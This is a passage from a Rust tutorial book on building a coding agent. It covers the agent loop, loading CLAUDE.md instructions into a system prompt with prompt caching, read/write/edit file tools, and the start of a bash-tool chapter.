-> push: Assistant(text: "The sum is 5")
-> return Ok("The sum is 5")
Two provider calls, one tool execution, clean exit. The final message history has 4 entries: User, Assistant (with tool call), ToolResult, Assistant (with text).
How this compares to Claude Code
Our SimpleAgent is a teaching implementation. Claude Code's real agent is considerably more complex. Here is what it adds:
| Feature | Our agent | Claude Code |
|---|---|---|
| Core loop | loop { match stop_reason } | Same pattern, but with async hooks at every stage |
| Streaming | Separate run_with_events | Integrated SSE streaming with StreamProvider |
| Permissions | None | Full permission pipeline checked before every tool call |
| Max turns | None | Configurable ceiling on loop iterations |
| Truncation | None | Tool result size limits |
| Compaction | None | Auto-compacts when approaching token limit |
| Hooks | None | Pre/post tool hooks with shell command execution |
| Concurrency | Sequential tool execution | Parallel execution for safe tools |
| Error recovery | Tool errors as results | Same, plus retry logic for transient provider errors |
The good news: the architecture is the same. Every feature in the right column plugs into the same loop structure. Permissions are checked in execute_tools before calling t.call(). Compaction runs at the top of the loop when token count is high. Hooks fire around tool execution.
Tests
Run the tests to verify your implementation:
cargo test -p mini-claw-code-starter test_single_turn_ # single_turn tests
cargo test -p mini-claw-code-starter test_simple_agent_ # SimpleAgent tests
What the tests verify
Single-turn tests (test_single_turn_):
test_single_turn_direct_response-- provider returns text withStopReason::Stop; verifies the agent returns that text directlytest_single_turn_one_tool_call-- provider returns a tool call then a final answer; verifies the agent executes the tool and returns the final texttest_single_turn_unknown_tool-- provider requests a tool that is not registered; verifies the agent returns an error string (not a panic) and the loop continues
SimpleAgent tests (test_simple_agent_):
test_simple_agent_text_response--run()with a provider that returns text; verifies the response stringtest_simple_agent_single_tool_call-- provider scripts a tool call followed by a final answer; verifies the agent loops correctly and returns the final texttest_simple_agent_unknown_tool-- provider requests a tool that is not registered; verifies the agent returns an error string (not a panic) and the loop continuestest_simple_agent_multi_step_loop-- provider scripts two tool calls then a final answer; verifies the agent loops correctly through multiple tool rounds
Implementation checklist
Open src/agent.rs in the starter. You will see unimplemented!() stubs with doc comments for each method. Here is what to fill in:
-
SimpleAgent::new-- Initialize with the provider and an emptyToolSet. -
SimpleAgent::tool-- Push the tool intoself.tools, returnself. -
execute_tools-- Look up each tool, execute, catch errors. ReturnVec<(String, String)>. -
chat-- The core loop. Call provider, match stop reason, dispatch tools, push messages, loop. -
run-- Create messages withMessage::User(prompt), delegate tochat. -
run_with_history-- Same loop aschatbut emitAgentEvents through a channel. Handle errors as events instead of?. -
run_with_events-- Create messages, delegate torun_with_history.
Start with new and tool. Then implement execute_tools -- you can test it implicitly through run. Then chat, then run. Save the event methods for last.
Key takeaway
The agentic loop is surprisingly small -- a loop, a match on StopReason, and a helper that dispatches tool calls. Every feature a production agent adds (permissions, streaming, compaction, hooks) plugs into this same skeleton. If you understand chat(), you understand the architecture of every coding agent.
What you have now
After this chapter, you have a working coding agent. Not a complete one -- it has no real tools yet (those come in later chapters) -- but the core loop is done. You can register any tool that implements the Tool trait, point it at any provider that implements Provider, and the agent will autonomously loop until it has an answer.
This is the skeleton that everything else hangs on. Every feature you add later -- real tools like Bash and Read, permissions, streaming -- plugs into the loop you just built.
Check yourself
← Chapter 6: Tool Interface · Contents · Chapter 8: System Prompt →
Chapter 8: System Prompt
File(s) to edit:
src/instructions.rsTest to run:cargo test -p mini-claw-code-starter instructions(InstructionLoader) Estimated time: 25 min
Every LLM-based agent starts with a system prompt -- an invisible preamble that shapes every response the model produces. A sloppy prompt gives you a chatbot. A carefully engineered prompt gives you a coding agent that follows safety rules, uses tools correctly, and adapts to the project it is working in.
Claude Code's system prompt is over 900 lines of assembled text. It is not written as a single string. It is built from modular sections -- identity, safety rules, tool schemas, environment info, project instructions -- stitched together by a builder at startup. Some sections never change between sessions (tool schemas, core instructions). Others change every time (working directory, git status, CLAUDE.md contents). This distinction is not cosmetic. It is the foundation of prompt caching, an optimization that can cut costs and latency dramatically.
In this chapter you will build the InstructionLoader -- the component that
discovers project-specific CLAUDE.md files by walking up the filesystem. We will
also discuss system prompt architecture concepts (sections, static/dynamic
splitting, prompt caching) that production agents like Claude Code use. Our
starter focuses on the instruction loading piece, which is the most practically
useful part.
Goal
Implement InstructionLoader in src/instructions.rs so that:
InstructionLoaderwalks up the filesystem to discover and load CLAUDE.md files.load()concatenates discovered files into a single string with headers.system_prompt_section()wraps the loaded instructions for inclusion in a system prompt.
How instruction loading works
flowchart TD
A[InstructionLoader::discover] -->|walks upward| B["/home/user/CLAUDE.md"]
A -->|walks upward| C["/home/user/project/CLAUDE.md"]
A -->|starts here| D["/home/user/project/backend/CLAUDE.md"]
B --> E[Reverse to root-first order]
C --> E
D --> E
E --> F[InstructionLoader::load]
F -->|concatenates with headers| G[Combined instructions string]
G --> H[system_prompt_section]
H --> I[Ready for system prompt]
Why system prompts matter for agents
A vanilla LLM is a text completer. It has no idea it can run bash commands, read files, or edit code -- unless you tell it. The system prompt is where you tell it.
For a coding agent, the system prompt must do several things:
- Identity: "You are a coding agent with access to tools." Without this, the model may refuse tool calls or behave like a generic assistant.
- Safety: "Do not delete files outside the working directory. Do not introduce security vulnerabilities." Safety rules constrain what the model will attempt.
- Tool schemas: The JSON schema definitions for every available tool. The model needs these to know how to call tools -- what parameters they accept, which are required, what types they expect.
- Environment: The working directory, OS, shell, git status. This context prevents the model from guessing about the environment.
- Project instructions: Contents of CLAUDE.md files that tell the model about project conventions, preferred patterns, and things to avoid.
Claude Code assembles all of these into a single system prompt before each conversation. Sections are ordered deliberately, and a cache boundary separates the parts that change from the parts that do not.
Concepts: sections and cache boundaries
Before diving into the code, let's understand how production agents like Claude Code structure their system prompts. These concepts inform the design even though our starter takes a simpler approach.
Prompt sections
A production system prompt is built from modular sections -- identity, safety rules, tool schemas, environment info, project instructions. Each section is a named chunk of text that renders as:
# identity
You are a coding agent. You help users with software engineering tasks
using the tools available to you.
The heading helps the LLM parse the prompt structure and makes debugging easier when you inspect the assembled prompt.
Static vs. dynamic: the cache boundary
LLM API calls are expensive. Every token in the system prompt is processed on every request. Claude's prompt caching feature lets you mark a prefix of the prompt as cacheable -- the API processes it once, caches the internal state, and reuses it on subsequent requests. This can reduce latency by up to 85% and cost by up to 90% for long prompts.
But caching only works for a prefix. If any byte in the cached prefix changes, the cache is invalidated. This means you need to put the stable parts first and the changing parts last:
+---------------------------------------+
| Static sections (cacheable) |
| - Identity |
| - Safety instructions |
| - Tool schemas |
| |
| [these rarely change] |
+-------- CACHE BOUNDARY ---------------+
| Dynamic sections (per-session) |
| - Working directory |
| - Git status |
| - CLAUDE.md instructions |
| - Custom user instructions |
| |
| [these change every session] |
+---------------------------------------+
Claude Code calls this boundary SYSTEM_PROMPT_DYNAMIC_BOUNDARY. Everything
above it is sent with a cache control header. Everything below it is fresh on
each request.
A production agent would implement a SystemPromptBuilder that maintains
separate lists of static and dynamic sections, renders each half independently,
and supports cache-aware providers. These types (SystemPromptBuilder,
PromptSection) are conceptual in this chapter -- the starter does not include
them. Instead, the starter implements InstructionLoader in
src/instructions.rs, which is the most practically useful component to build
from scratch.
InstructionLoader: discovering CLAUDE.md
Claude Code loads project-specific instructions from CLAUDE.md files. These files let users customize the agent's behavior per project -- preferred coding style, test commands, things to avoid. The agent discovers them by walking up the filesystem from the current working directory.
Open src/instructions.rs. Here is the starter stub:
#![allow(unused)] fn main() { pub struct InstructionLoader { file_names: Vec<String>, } impl InstructionLoader { pub fn new(file_names: &[&str]) -> Self { unimplemented!("Convert file_names to Vec<String>") } pub fn default_files() -> Self { Self::new(&["CLAUDE.md", ".mini-claw/instructions.md"]) } pub fn discover(&self, start_dir: &Path) -> Vec<PathBuf> { unimplemented!( "Walk up from start_dir, collect matching files, reverse for root-first order" ) } pub fn load(&self, start_dir: &Path) -> Option<String> { unimplemented!("Discover files, read each, join with headers showing source path") } pub fn system_prompt_section(&self, start_dir: &Path) -> Option<String> { unimplemented!("Call load(), wrap with instruction preamble") } } }
The loader is parameterized by file names to search for. The default
configuration looks for CLAUDE.md and .mini-claw/instructions.md.
Rust concept: borrowed slices to owned collections
The constructor takes &[&str] -- a borrowed slice of borrowed string slices -- and converts it to Vec<String>. This is a common Rust pattern at API boundaries: accept borrowed data for flexibility (the caller can pass string literals, &String, or anything that derefs to &str), but store owned data internally so the struct has no lifetime parameter and can live independently of its creator.
Implementing new()
The constructor converts the &[&str] slice into owned String values:
#![allow(unused)] fn main() { pub fn new(file_names: &[&str]) -> Self { Self { file_names: file_names.iter().map(|s| s.to_string()).collect(), } } }
discover() -- walking upward
The discover() method starts at a given directory and walks toward the
filesystem root, checking each directory for the target files:
#![allow(unused)] fn main() { pub fn discover(&self, start_dir: &Path) -> Vec<PathBuf> { let mut found = Vec::new(); let mut dir = Some(start_dir.to_path_buf()); while let Some(current) = dir { for name in &self.file_names { let candidate = current.join(name); if candidate.is_file() { found.push(candidate); } } dir = current.parent().map(|p| p.to_path_buf()); } found.reverse(); // Root-first order found } }
The walk collects files from the start directory up to the root, then reverses the list so root-level files come first. This ordering matters: global instructions appear before project-specific ones, and the LLM sees the most specific instructions last (closest to the user prompt).
Consider a project at /home/user/project/backend:
/home/user/CLAUDE.md <-- global preferences
/home/user/project/CLAUDE.md <-- project conventions
/home/user/project/backend/CLAUDE.md <-- backend-specific rules
After discover(), the vector contains them in that order: global first, most
specific last.
load() -- reading and concatenating
The load() method calls discover(), reads each file, and joins them into a
single string. Each file's content is prefixed with # Instructions from <path>
so the LLM knows where each block came from. Files are separated by ---
markers. Empty or unreadable files are silently skipped. If no instruction files
exist at all, load() returns None.
The output for two files looks like:
# Instructions from /home/user/CLAUDE.md
Use American English. Prefer explicit error handling.
---
# Instructions from /home/user/project/CLAUDE.md
Run tests with `cargo test`. Never modify generated files.
system_prompt_section() -- wrapping for the prompt
The system_prompt_section() method calls load() and wraps the result with
an instruction preamble. This produces a string ready to insert into a system
prompt. If no instruction files are found, it returns None.
The exact preamble should read:
#![allow(unused)] fn main() { format!( "The following project instructions were loaded automatically. \ Follow them carefully:\n\n{content}" ) }
The test checks for the substring "project instructions" in the output, so
your preamble text must include those words.
Using InstructionLoader in a system prompt
In a production agent, the instruction loader is wired into the prompt assembly pipeline. The loaded instructions are always dynamic -- they depend on which directory the agent is launched from.
Here is how you might use InstructionLoader to build a simple system prompt:
#![allow(unused)] fn main() { let mut prompt = String::from("You are a coding agent.\n\n"); let loader = InstructionLoader::default_files(); if let Some(section) = loader.system_prompt_section(Path::new(cwd)) { prompt.push_str(§ion); } }
A more sophisticated agent would separate static and dynamic sections for prompt caching (see the concepts discussion above), but this simple approach works well for getting started.
How Claude Code does it
Claude Code's prompt assembly follows the same principles at larger scale. Its system prompt includes identity, safety rules, tool schemas, behavioral guidelines, environment details, CLAUDE.md instructions from multiple levels, and session metadata -- routinely exceeding 900 lines.
Without prompt caching, every API call would reprocess all of that. Claude Code
marks the cache boundary with a SYSTEM_PROMPT_DYNAMIC_BOUNDARY marker. The
provider splits the system message at this boundary and sends the prefix with
cache_control: { type: "ephemeral" }. The API caches the prefix's internal
representation and reuses it for subsequent requests, often covering 80%+ of
the prompt.
As an extension, you could build a SystemPromptBuilder that maintains separate
lists of static and dynamic sections, renders each half independently, and lets
a cache-aware provider split the prompt at the boundary. Our starter focuses on
the instruction loading piece, which is the most practically useful component.
Running the tests
Run the InstructionLoader tests:
cargo test -p mini-claw-code-starter instructions
What the tests verify
test_instructions_instruction_loader_discover: Creates a temp directory with a CLAUDE.md file and verifiesdiscover()finds it.test_instructions_instruction_loader_load: Same setup, verifiesload()returns the file's content.test_instructions_instruction_loader_no_files: No instruction files exist.load()returnsNone.
Recap
You have built the instruction loading infrastructure:
InstructionLoaderdiscovers CLAUDE.md files by walking up the filesystem. It concatenates them in root-first order so that global instructions appear before project-specific ones.system_prompt_section()wraps discovered instructions for inclusion in a system prompt.
You also learned the key concepts behind production system prompt architecture:
- Prompt sections break the system prompt into named, modular chunks.
- The cache boundary separates what changes from what does not, enabling prompt caching -- a single optimization that can cut costs and latency by an order of magnitude on long prompts. Every production agent does this.
As an extension, you could implement PromptSection and SystemPromptBuilder
types to manage the static/dynamic split structurally. The reference
implementation (mini-claw-code) shows one approach.
Key takeaway
A system prompt is not a single string -- it is an assembly of modular sections, ordered so that stable content comes first (enabling prompt caching) and session-specific content comes last. The InstructionLoader is the simplest but most user-facing piece of this assembly: it gives every project a way to customize the agent's behavior through plain Markdown files.
What's next
In Chapter 9: File Tools you will implement the tools that let your agent interact with the filesystem -- reading, writing, and editing files. These are the tools whose schemas will eventually appear in the static portion of your system prompt.
Check yourself
← Chapter 7: The Agentic Loop (Deep Dive) · Contents · Chapter 9: File Tools →
Chapter 9: File Tools
File(s) to edit:
src/tools/write.rs,src/tools/edit.rs(theTODO ch9:stubs).src/tools/read.rswas completed back in Chapter 2 — this chapter revisits it as the baseline and contrasts it with the design decisions that come with writing and editing. Tests to run:cargo test -p mini-claw-code-starter test_read_(ReadTool),cargo test -p mini-claw-code-starter test_write_(WriteTool),cargo test -p mini-claw-code-starter test_edit_(EditTool) Estimated time: 50 min
Goal
- Revisit
ReadTool(built in Ch2) as the baseline and understand the trade-offs of its minimal design vs. production tools that add line-numbering and offset/limit. - Implement
WriteToolwith automatic parent directory creation so the agent can create new files without a separatemkdirstep. - Implement
EditToolwith a uniqueness check so the agent can make surgical string replacements in existing files. - Understand why tool errors are returned as
Err(...)in the starter (the agent loop converts them to messages the LLM can read and recover from -- the detailed rationale is in Chapter 6 §"Why tool errors never terminate the agent").
A coding agent that cannot touch the filesystem is just a chatbot with delusions of grandeur. It can describe code changes, suggest fixes, explain algorithms -- but it cannot do any of it. The tools you built in Chapter 6 gave your agent hands. In this chapter you give those hands something to hold: files.
File operations are the most fundamental tools in any coding agent's toolkit.
Claude Code ships with Read, Write, and Edit tools (among many others), and
every competitor -- Cursor, Aider, OpenCode -- has its own version. The
operations are simple (read bytes, write bytes, search-and-replace), but the
design choices around them determine whether the agent can reliably modify a
codebase or whether it stumbles over its own edits. You will implement all three
tools in this chapter: ReadTool, WriteTool, and EditTool.
How the file tools work together
flowchart LR
W[WriteTool] -->|creates file| FS[(Filesystem)]
E[EditTool] -->|search & replace| FS
R[ReadTool] -->|reads content| FS
W -.->|"auto-creates parent dirs"| FS
E -.->|"checks uniqueness first"| FS
sequenceDiagram
participant LLM
participant Agent
participant FS as Filesystem
LLM->>Agent: write(path, content)
Agent->>FS: create dirs + write file
FS-->>Agent: ok
Agent-->>LLM: "wrote /path/to/file"
LLM->>Agent: edit(path, old, new)
Agent->>FS: read, check uniqueness, replace, write
FS-->>Agent: ok
Agent-->>LLM: "edited /path/to/file"
LLM->>Agent: read(path)
Agent->>FS: read file
FS-->>Agent: file contents
Agent-->>LLM: file contents
6.1 ReadTool
ReadTool is the simplest of the file tools: it takes a path, reads the file
with tokio::fs::read_to_string, and returns the raw contents as a string. No
line numbering, no offset/limit, no transformation. That is what both the
starter and the reference implementation (mini-claw-code/src/tools/read.rs)
do -- we keep it deliberately minimal so the rest of the chapter (Write, Edit)
has room to breathe.
Design discussion: why production agents add more
Production agents like Claude Code go further. Their read tool typically
numbers every line (cat -n style) and supports partial reads via offset and
limit parameters. Two reasons this matters in real systems:
- Line numbers give the LLM a coordinate system. "Replace the string on line 42" is precise. "Replace the string somewhere around the middle of the function" is not. This becomes especially valuable for the Edit tool, where the model has to produce an exact string to match and numbered lines help it copy the right chunk.
- Offset/limit protects the context window. A single 50k-line generated file can blow past the model's context. Paginated reads let the LLM fetch what it needs without burning the whole budget on one file.
Neither of these appear in the starter or the reference implementation in
this book -- they are extensions we point at but deliberately leave out so the
core Tool implementation stays a dozen lines. Adding them yourself is one of
the listed extensions at the end of the chapter.
The starter stub
Open src/tools/read.rs:
#![allow(unused)] fn main() { use anyhow::Context; use serde_json::Value; use crate::types::*; pub struct ReadTool { definition: ToolDefinition, } impl Default for ReadTool { fn default() -> Self { Self::new() } } impl ReadTool { /// Create a new ReadTool with its JSON schema definition. /// /// The schema should declare one required parameter: "path" (string). pub fn new() -> Self { unimplemented!( "Create a ToolDefinition with name \"read\" and a required \"path\" parameter" ) } } #[async_trait::async_trait] impl Tool for ReadTool { fn definition(&self) -> &ToolDefinition { &self.definition } async fn call(&self, _args: Value) -> anyhow::Result<String> { unimplemented!( "Extract \"path\" from args, read file with tokio::fs::read_to_string, return contents" ) } } }
You need to fill in two methods:
new()-- build aToolDefinitionwith name"read"and a required"path"parameter.call()-- extract the path, read the file, and return its contents.
Implementing the ReadTool
The definition. One required parameter: path. The LLM sees this as a JSON
Schema and knows it must provide path.
#![allow(unused)] fn main() { pub fn new() -> Self { Self { definition: ToolDefinition::new("read", "Read the contents of a file.") .param("path", "string", "Absolute path to the file", true), } } }
The call() method. Read the file and return its contents as a String:
#![allow(unused)] fn main() { async fn call(&self, args: Value) -> anyhow::Result<String> { let path = args["path"] .as_str() .context("missing 'path' argument")?; let content = tokio::fs::read_to_string(path) .await .with_context(|| format!("failed to read '{path}'"))?; Ok(content) } }
Rust concept: anyhow::Context for rich errors
The .context("missing 'path' argument")? and .with_context(|| format!("failed to read '{path}'")) calls wrap the underlying error with a human-readable message. context() takes a static string; with_context() takes a closure for dynamic messages (avoiding the allocation when the ? path is not taken). Both return anyhow::Error, which chains the original error underneath -- so the full error message reads like "failed to read 'foo.rs': No such file or directory". This chaining is what makes anyhow errors informative without custom error types.
Notice that call() returns anyhow::Result<String>, not ToolResult. The
starter's Tool trait is simplified -- tools return plain strings on success.
If the tool encounters an error (missing argument, I/O failure), it returns
Err(...). The agent loop converts errors to error messages that the LLM sees.
Possible extensions. A production-grade ReadTool would add offset and
limit parameters for partial reads and format output with tab-separated line
numbers (like cat -n). Neither is in this book's reference implementation;
both are well-scoped exercises if you want to go further.
What the output looks like
Given a file with three lines:
alpha
beta
gamma
The tool returns the raw file contents:
alpha
beta
gamma
This is the simplest approach. Production tools extend it with line numbers and partial-read support, which are useful for large files and for giving the LLM precise line references for later edits -- see the design discussion above.
6.2 WriteTool
Writing a file is conceptually simple: take a path and content, write the content to the path. But there is one practical detail that makes a big difference: creating parent directories automatically.
When the LLM writes src/handlers/auth/middleware.rs, the src/handlers/auth/
directory might not exist yet. A naive tool would fail with "No such file or
directory." The agent would then need to call bash("mkdir -p ...") and retry.
This wastes a tool-use round and confuses the model. Better to handle it
silently.
The starter stub
Open src/tools/write.rs:
#![allow(unused)] fn main() { use anyhow::Context; use serde_json::Value; use crate::types::*; pub struct WriteTool { definition: ToolDefinition, } impl Default for WriteTool { fn default() -> Self { Self::new() } } impl WriteTool { /// Schema: required "path" and "content" parameters. pub fn new() -> Self { unimplemented!( "Use ToolDefinition::new(name, description).param(...).param(...)" ) } } #[async_trait::async_trait] impl Tool for WriteTool { fn definition(&self) -> &ToolDefinition { &self.definition } async fn call(&self, _args: Value) -> anyhow::Result<String> { unimplemented!( "Extract path and content, create parent dirs, write file, return format!(\"wrote {path}\")" ) } } }
Implementing the WriteTool
The definition. Two required parameters: path and content.
#![allow(unused)] fn main() { pub fn new() -> Self { Self { definition: ToolDefinition::new("write", "Write content to a file, creating directories as needed") .param("path", "string", "Absolute path to write to", true) .param("content", "string", "Content to write", true), } } }
The call() method. Extract the arguments, create parent directories,
write the file, and return a confirmation string:
#![allow(unused)] fn main() { async fn call(&self, args: Value) -> anyhow::Result<String> { let path = args["path"] .as_str() .context("missing 'path' argument")?; let content = args["content"] .as_str() .context("missing 'content' argument")?; // Create parent directories if let Some(parent) = std::path::Path::new(path).parent() { if !parent.as_os_str().is_empty() { tokio::fs::create_dir_all(parent).await?; } } tokio::fs::write(path, content).await?; Ok(format!("wrote {path}")) } }
The return value is format!("wrote {path}") -- a simple confirmation string.
The agent sees this and knows the write succeeded.
Walking through the code
Two required parameters. Both path and content are required. There is no
optional behavior here -- you always need both.
Auto-creating directories. The create_dir_all call is the key design
choice. It mirrors mkdir -p -- if the directory already exists, it is a no-op.
If intermediate directories are missing, it creates them all. The guard
!parent.as_os_str().is_empty() handles the edge case where the path has no
parent component (e.g., a bare filename like "file.txt"), where calling
create_dir_all("") would fail.
Overwrite semantics. tokio::fs::write overwrites the file if it already
exists and creates it if it does not. There is no append mode, no conflict
detection. This is deliberate -- the tool is a clean write, not a merge. If the
LLM wants to modify an existing file, it should use the Edit tool.
Confirmation string. The result reports "wrote /path/to/file". This gives
the model confirmation that the write succeeded.
6.3 EditTool
The Edit tool is the most interesting of the three, and it teaches the most important design lesson in this book: errors are values, not exceptions.
The Edit tool performs a search-and-replace on a file. It takes a path, an
old_string to find, and a new_string to replace it with. The critical
constraint: old_string must appear exactly once in the file. Zero matches
means the model got the string wrong. More than one match means the replacement
is ambiguous -- we do not know which occurrence to change.
Both of these are expected failure modes, not bugs. The model frequently gets strings slightly wrong (missing whitespace, wrong indentation, stale content from a previous edit). The tool must report these failures clearly so the model can correct itself.
The starter stub
Open src/tools/edit.rs:
#![allow(unused)] fn main() { use anyhow::{Context, bail}; use serde_json::Value; use crate::types::*; pub struct EditTool { definition: ToolDefinition, } impl Default for EditTool { fn default() -> Self { Self::new() } } impl EditTool { /// Schema: required "path", "old_string", "new_string" parameters. pub fn new() -> Self { unimplemented!( "Use ToolDefinition::new(name, description).param(...).param(...).param(...)" ) } } #[async_trait::async_trait] impl Tool for EditTool { fn definition(&self) -> &ToolDefinition { &self.definition } async fn call(&self, _args: Value) -> anyhow::Result<String> { unimplemented!( "Extract args, read file, verify old_string appears exactly once, replace, write back" ) } } }
Implementing the EditTool
The definition. Three required parameters: path, old_string, and
new_string.
#![allow(unused)] fn main() { pub fn new() -> Self { Self { definition: ToolDefinition::new( "edit", "Replace an exact string in a file. The old_string must appear exactly once.", ) .param("path", "string", "Absolute path to the file to edit", true) .param("old_string", "string", "The exact string to find", true) .param("new_string", "string", "The replacement string", true), } } }
The call() method. Read the file, check uniqueness, replace, write back:
#![allow(unused)] fn main() { async fn call(&self, args: Value) -> anyhow::Result<String> { let path = args["path"] .as_str() .context("missing 'path' argument")?; let old = args["old_string"] .as_str() .context("missing 'old_string' argument")?; let new = args["new_string"] .as_str() .context("missing 'new_string' argument")?; let content = tokio::fs::read_to_string(path) .await .with_context(|| format!("failed to read '{path}'"))?; let count = content.matches(old).count(); if count == 0 { bail!("old_string not found in '{path}'"); } if count > 1 { bail!("old_string appears {count} times in '{path}', must be unique"); } let updated = content.replacen(old, new, 1); tokio::fs::write(path, &updated).await?; Ok(format!("edited {path}")) } }
The return value is format!("edited {path}") on success.
Walking through the code
Three required parameters. path, old_string, and new_string are all
required. The model must specify exactly what to find and what to replace it
with. There is no regex, no line-number-based editing, no diff format. Just
plain string replacement. This simplicity is a feature -- it is unambiguous and
easy for the model to use correctly.
The uniqueness check. This is the heart of the tool:
#![allow(unused)] fn main() { let count = content.matches(old).count(); if count == 0 { bail!("old_string not found in '{path}'"); } if count > 1 { bail!("old_string appears {count} times in '{path}', must be unique"); } }
Rust concept: bail! macro
bail!("old_string not found in '{path}'") is shorthand for return Err(anyhow::anyhow!("...")). It immediately returns an error from the function with the given message. It is part of the anyhow crate and works in any function that returns anyhow::Result. Compare with ? (which propagates an existing error) -- bail! creates a new error on the spot.
Two branches, both returning errors via bail!. In the starter's simplified
Tool trait, tools return anyhow::Result<String>. When the tool returns an
Err, the agent loop converts it to an error message that the LLM sees. The
model can then retry with a corrected string.
Error handling in the simplified trait
The starter's Tool trait returns anyhow::Result<String> from call(). This
means error handling is straightforward -- use bail!() or ? for any failure,
and the agent loop takes care of converting errors to messages the LLM can read.
In the agent's execute_tools method, a tool call is handled like this:
#![allow(unused)] fn main() { match tool.call(call.arguments.clone()).await { Ok(result) => result, Err(e) => format!("error: {e}"), } }
An Err from call() becomes a string like "error: old_string not found in 'foo.rs'".
The model sees this and knows to try a different string.
A more sophisticated design (used by Claude Code) distinguishes between
recoverable tool-level errors (returned as success values) and genuine I/O
failures (returned as Err). The starter keeps things simple by using Err
for both -- the agent loop handles them the same way regardless.
6.4 Integration: Write, Edit, Read
The real power of these tools comes from combining them. A typical agent workflow looks like this:
- Write a new file
- Edit to fix a bug or refine the code
- Read to verify the result
Here is what that looks like as tool calls:
Agent: I'll create the handler file.
-> write(path: "/tmp/project/handler.rs", content: "fn main() { println!(\"hello\"); }")
<- "wrote /tmp/project/handler.rs"
Agent: Let me update the greeting.
-> edit(path: "/tmp/project/handler.rs", old_string: "hello", new_string: "goodbye")
<- "edited /tmp/project/handler.rs"
Agent: Let me verify the change.
-> read(path: "/tmp/project/handler.rs")
<- "fn main() { println!(\"goodbye\"); }"
Each tool does one thing and communicates its result clearly. The agent sees the output of each step and decides what to do next. If the edit had failed (wrong string), the agent would see the error and retry with the correct string.
This write-edit-read pattern is how Claude Code modifies files in practice. It does not generate a complete file and overwrite -- that would lose any content outside the modified section. Instead, it uses surgical edits on the specific lines that need to change, then reads the result to confirm. This is more reliable and produces smaller diffs.
6.5 How Claude Code does it
Claude Code's file tools follow the same protocol but with more sophistication:
Read supports images and PDFs. It detects binary files and renders them appropriately (base64-encoded images are sent as multimodal content blocks). It has smarter truncation with token counting rather than character counting, and it warns when a file is empty.
Write checks for protected files. Claude Code maintains a list of files
that should never be overwritten (.env, credentials.json, etc.) and blocks
writes to them. It also integrates with the permission system to require user
approval before overwriting existing files in certain modes.
Edit is considerably more powerful. It supports multiple edits in a single call, has a diff preview mode, handles encoding detection, and validates that the edit produces syntactically valid code (for supported languages). It also has a more nuanced uniqueness check that considers context lines around the match to disambiguate.
But the core protocol is identical to what you just built. A struct holds the
definition. The Tool trait provides the interface. The call method does
the work. The agent loop dispatches and collects results. Understanding our
three simple tools gives you the foundation to understand Claude Code's full
tool suite.
6.6 Tool file organization
All three tools live in src/tools/, alongside the other tools you will build
in later chapters. The module structure in the starter:
src/tools/
mod.rs -- re-exports all tools
ask.rs -- AskTool (bonus)
bash.rs -- BashTool (Chapter 10)
edit.rs -- EditTool
read.rs -- ReadTool
write.rs -- WriteTool
The mod.rs barrel re-exports everything:
#![allow(unused)] fn main() { mod ask; mod bash; mod edit; mod read; mod write; pub use ask::*; pub use bash::BashTool; pub use edit::EditTool; pub use read::ReadTool; pub use write::WriteTool; }
This lets consumers write use crate::tools::{ReadTool, WriteTool, EditTool}
without reaching into individual modules.
6.7 Tests
Run the file tool tests:
cargo test -p mini-claw-code-starter test_read_ # ReadTool
cargo test -p mini-claw-code-starter test_write_ # WriteTool
cargo test -p mini-claw-code-starter test_edit_ # EditTool
Cargo test filters are substring matches, not regex, so you cannot OR them
together into a single invocation. Run the three commands separately, or
drop all three prefixes with a catch-all like
cargo test -p mini-claw-code-starter -- --test-threads=1 if you want to
see everything at once.
Here is what each test verifies:
ReadTool tests (in test_read_)
test_read_read_definition-- Checks that the tool definition has the name "read".test_read_read_file-- Reads a file and verifies the content appears in the output.test_read_read_missing_file-- Attempts to read a file that does not exist. Verifies that the result is anErr.
WriteTool tests (in ``)
test_write_creates_file-- Writes content to a new file, verifies the result contains a confirmation, and reads back the file to confirm the content.test_write_creates_dirs-- Writes to a file inside nested directories. All intermediate directories are created automatically.test_write_overwrites_existing-- Writes to a file that already has content. Verifies the old content is replaced.
EditTool tests (in ``)
test_edit_replaces_string-- Edits a string in a file. Verifies the result says "edited" and the file is updated.test_edit_not_found-- Attempts to replace a string that does not exist. Verifies the result is anErr.test_edit_not_unique-- Attempts to replace a string that appears multiple times. Verifies the error mentions the ambiguity.
Recap
Three tools, one pattern. Every tool in this chapter follows the same structure:
- A struct with a
definition: ToolDefinitionfield. - A
new()constructor that builds the definition with the parameter builder from Chapter 4. - A
Toolimpl withdefinition()andcall().
The pattern scales. When you add Bash in Chapter 10, the shape is identical --
only the call() logic changes. This is the power of the Tool trait: a
uniform interface that makes every tool interchangeable from the agent's
perspective.
The key lessons from this chapter:
- Automate the obvious. The
WriteToolcreates parent directories automatically, saving the agent a wasted tool-use round. - Check uniqueness. The
EditToolrequires the old string to appear exactly once. Zero matches means the model got the string wrong. Multiple matches means the replacement is ambiguous. - Errors propagate cleanly. Tools return
anyhow::Result<String>. The agent loop catches errors and converts them to messages the LLM can read and recover from.
Key takeaway
File tools are the agent's hands on the codebase. The three-tool split -- read, write, edit -- gives the LLM clear verbs for distinct operations rather than one overloaded "file" tool. The EditTool's uniqueness check is the single most important design decision: it forces the LLM to provide an unambiguous match, catching mistakes early and enabling reliable self-correction.
In Chapter 10: Bash Tool, you will build the most powerful (and most dangerous) tool in the agent's arsenal -- one that can run arbitrary shell commands.
Check yourself
← Chapter 8: System Prompt · Contents · Chapter 10: Bash Tool →
Chapter 10: Bash Tool
File(s) to edit:
src/tools/bash.rsTest to run:cargo test -p mini-claw-code-starter test_bash_Estimated time: 35 min
Goal
- Implement
BashToolso the agent can run arbitrary shell commands viabash -cand capture combined stdout/stderr output. - Handle the three output cases correctly: stdout only, stderr only, and no output (the
"(no output)"sentinel). - Understand why the tool has no safety rails in this chapter and what later chapters add (permissions, command classification, hooks).
The bash tool is the most powerful tool in a coding agent. It is also the most dangerous. With a single tool call, the LLM can compile code, run tests, install packages, inspect processes, query databases, or delete your entire filesystem. Every other tool -- read, write, edit, grep -- does one thing. Bash does everything.
This power is what makes a coding agent useful. An agent that can only read and write files is a fancy text editor. An agent that can run arbitrary shell commands is a programmer. It can try things, see what happens, and iterate -- the same workflow a human developer follows. Claude Code's bash tool is its most-used tool by far, accounting for the majority of all tool invocations in a typical session.
In this chapter you will build the BashTool. It takes a command string, runs it in a bash subprocess, and returns the combined output. (A timeout is shown later as an extension.) The implementation is straightforward -- the hard part is everything we deliberately leave out. There is no sandboxing, no command filtering, no permission checking. The LLM can run anything. Chapters 13-16 add the safety rails. For now, we build the engine and trust the driver.
How the BashTool processes a command
flowchart TD
A[LLM sends ToolCall: bash] --> B[Extract command from args]
